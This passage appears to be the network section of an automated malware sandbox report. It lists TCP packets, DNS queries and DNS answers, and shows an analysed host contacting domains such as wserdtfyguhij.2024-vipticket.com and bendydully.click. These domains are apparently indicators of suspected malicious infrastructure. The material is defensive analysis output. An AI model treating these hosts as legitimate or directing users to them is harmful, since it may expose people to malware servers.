Dec 6, 2024 15:25:48.374489069 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.374506950 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.374558926 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.374567032 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.374613047 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.379734993 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.379751921 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.379806995 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.379822969 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.379838943 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.379861116 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.385571957 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.385588884 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.385654926 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.385663033 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.385699987 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.538939953 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.538964987 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.539021015 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.539040089 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.539083004 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.539102077 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.544425011 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.544445992 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.544498920 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.544512987 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.544544935 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.544569016 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.549457073 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.549477100 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.549536943 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.549542904 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.549571991 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.549583912 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.555326939 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.555344105 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.555387020 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.555397987 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.555423975 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.555443048 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.560935020 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.560954094 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.560992956 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.561002016 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.561034918 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.561047077 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.566864967 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.566884995 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.566936970 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.566943884 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.566973925 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.567003965 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.570717096 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.570766926 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.570801020 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.570811033 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.570820093 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.572244883 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.572304010 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.572310925 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.572354078 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.576759100 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.576797009 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.576822996 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.576828957 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.576868057 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.581604004 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.581619978 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.581676960 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.581684113 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.635075092 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.735059023 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.735085964 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.735148907 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.735162020 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.735203981 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.740905046 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.740922928 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.740964890 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.740971088 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.741014957 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.741893053 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.741952896 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.747535944 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.747558117 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.747632980 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.747639894 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.753379107 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.753408909 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.753447056 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.753452063 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.753488064 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.759253979 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.759279013 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.759318113 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.759324074 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.759366035 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.764910936 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.764928102 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.764987946 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.764993906 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.765044928 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.770015955 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.770061970 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.770081997 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.770087957 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.770129919 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.922662020 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.922691107 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.922748089 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.922764063 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.922795057 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.922806025 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.928515911 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.928531885 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.928589106 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.928595066 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.928633928 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.934720039 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.934741020 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.934773922 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.934781075 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.934804916 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.934822083 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.936754942 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.936846018 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.942404032 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.942425966 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.942461967 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.942471981 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.942516088 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.944475889 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.944523096 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.945564985 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.945619106 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.945628881 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.945660114 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.945673943 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.945696115 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.947959900 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:27:08.689655066 CET	49875	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:08.689697981 CET	443	49875	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:08.689762115 CET	49875	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:08.691169977 CET	49875	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:08.691184044 CET	443	49875	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:09.920396090 CET	443	49875	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:09.920489073 CET	49875	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:09.923562050 CET	49875	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:09.923573971 CET	443	49875	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:09.923882008 CET	443	49875	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:09.978224039 CET	49875	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:09.978252888 CET	49875	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:09.978404999 CET	443	49875	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:12.503833055 CET	443	49875	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:12.503937006 CET	443	49875	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:12.504138947 CET	49875	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:12.505528927 CET	49875	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:12.505528927 CET	49875	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:12.505553961 CET	443	49875	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:12.505565882 CET	443	49875	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:12.549640894 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:12.549685001 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:12.549756050 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:12.550054073 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:12.550066948 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:13.763962030 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:13.765494108 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:13.765494108 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:13.765508890 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:13.765769005 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:13.767113924 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:13.767147064 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:13.767189026 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.159703016 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.159748077 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.159807920 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.159837008 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.162575960 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.162617922 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.162626982 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.164663076 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.164710045 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.164716959 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.171746969 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.171801090 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.171812057 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.179985046 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.180053949 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.180062056 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.228748083 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.280282021 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.322540998 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.351381063 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.355246067 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.355324030 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.355357885 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.355376005 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.355427027 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.355542898 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.355561972 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.355577946 CET	49884	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.355583906 CET	443	49884	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.377095938 CET	49902	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.377151966 CET	443	49902	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:19.377233028 CET	49902	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.377540112 CET	49902	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:19.377549887 CET	443	49902	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:20.592817068 CET	443	49902	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:20.592956066 CET	49902	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:20.594721079 CET	49902	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:20.594734907 CET	443	49902	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:20.595045090 CET	443	49902	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:20.596205950 CET	49902	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:20.596347094 CET	49902	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:20.596380949 CET	443	49902	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:25.195943117 CET	443	49902	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:25.196063995 CET	443	49902	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:25.196192980 CET	49902	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:25.196382046 CET	49902	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:25.196408987 CET	443	49902	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:25.217931986 CET	49915	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:25.217983007 CET	443	49915	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:25.218086958 CET	49915	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:25.218394041 CET	49915	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:25.218404055 CET	443	49915	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:26.431181908 CET	443	49915	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:26.431330919 CET	49915	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:26.432636976 CET	49915	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:26.432643890 CET	443	49915	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:26.432959080 CET	443	49915	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:26.434204102 CET	49915	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:26.434354067 CET	49915	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:26.434385061 CET	443	49915	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:26.434448957 CET	49915	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:26.479335070 CET	443	49915	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:29.390805006 CET	443	49915	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:29.390902042 CET	443	49915	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:29.390997887 CET	49915	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:29.391211033 CET	49915	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:29.391227961 CET	443	49915	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:29.465783119 CET	49926	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:29.465837002 CET	443	49926	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:29.465915918 CET	49926	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:29.466252089 CET	49926	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:29.466264963 CET	443	49926	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:30.715653896 CET	443	49926	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:30.715790987 CET	49926	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:30.717084885 CET	49926	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:30.717097044 CET	443	49926	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:30.717365980 CET	443	49926	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:30.718693018 CET	49926	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:30.718857050 CET	49926	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:30.718882084 CET	443	49926	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:30.718949080 CET	49926	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:30.718956947 CET	443	49926	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:33.566103935 CET	443	49926	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:33.566196918 CET	443	49926	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:33.566287041 CET	49926	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:33.566431999 CET	49926	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:33.566457987 CET	443	49926	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:33.682588100 CET	49937	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:33.682636023 CET	443	49937	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:33.682693005 CET	49937	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:33.683183908 CET	49937	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:33.683197975 CET	443	49937	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:34.898473024 CET	443	49937	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:34.898544073 CET	49937	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:34.920386076 CET	49937	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:34.920419931 CET	443	49937	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:34.920748949 CET	443	49937	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:34.946449995 CET	49937	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:34.948761940 CET	49937	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:34.948772907 CET	443	49937	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:37.949826956 CET	443	49937	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:37.949925900 CET	443	49937	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:37.949984074 CET	49937	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:37.950098991 CET	49937	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:37.950125933 CET	443	49937	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:38.252500057 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:38.252547979 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:38.252688885 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:38.252995968 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:38.253009081 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.495089054 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.495203018 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.496505976 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.496515036 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.496759892 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.498106003 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.498810053 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.498852015 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.498999119 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.499032021 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.499183893 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.499205112 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.499367952 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.499388933 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.499578953 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.499608040 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.499813080 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.499842882 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.499854088 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.499866009 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.500066996 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.500096083 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.500118971 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.500289917 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.500322104 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.547326088 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:39.547631979 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.547682047 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.547718048 CET	49948	443	192.168.2.5	104.21.10.2
Dec 6, 2024 15:27:39.591331005 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:43.427618027 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:43.427723885 CET	443	49948	104.21.10.2	192.168.2.5
Dec 6, 2024 15:27:43.428095102 CET	49948	443	192.168.2.5	104.21.10.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 15:25:40.320895910 CET	62937	53	192.168.2.5	1.1.1.1
Dec 6, 2024 15:25:40.641602039 CET	53	62937	1.1.1.1	192.168.2.5
Dec 6, 2024 15:25:53.846319914 CET	65407	53	192.168.2.5	1.1.1.1
Dec 6, 2024 15:25:54.077687025 CET	53	65407	1.1.1.1	192.168.2.5
Dec 6, 2024 15:27:08.357959032 CET	57916	53	192.168.2.5	1.1.1.1
Dec 6, 2024 15:27:08.679616928 CET	53	57916	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 15:25:40.320895910 CET	192.168.2.5	1.1.1.1	0xaf27	Standard query (0)	wserdtfyguhij.2024-vipticket.com	A (IP address)	IN (0x0001)	false
Dec 6, 2024 15:25:53.846319914 CET	192.168.2.5	1.1.1.1	0x9174	Standard query (0)	mnzXUlzpaVuBYoehcauIn.mnzXUlzpaVuBYoehcauIn	A (IP address)	IN (0x0001)	false
Dec 6, 2024 15:27:08.357959032 CET	192.168.2.5	1.1.1.1	0x6d66	Standard query (0)	bendydully.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 15:25:40.641602039 CET	1.1.1.1	192.168.2.5	0xaf27	No error (0)	wserdtfyguhij.2024-vipticket.com		172.67.219.101	A (IP address)	IN (0x0001)	false
Dec 6, 2024 15:25:40.641602039 CET	1.1.1.1	192.168.2.5	0xaf27	No error (0)	wserdtfyguhij.2024-vipticket.com		104.21.78.95	A (IP address)	IN (0x0001)	false
Dec 6, 2024 15:25:54.077687025 CET	1.1.1.1	192.168.2.5	0x9174	Name error (3)	mnzXUlzpaVuBYoehcauIn.mnzXUlzpaVuBYoehcauIn	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2024 15:27:08.679616928 CET	1.1.1.1	192.168.2.5	0x6d66	No error (0)	bendydully.click		104.21.10.2	A (IP address)	IN (0x0001)	false
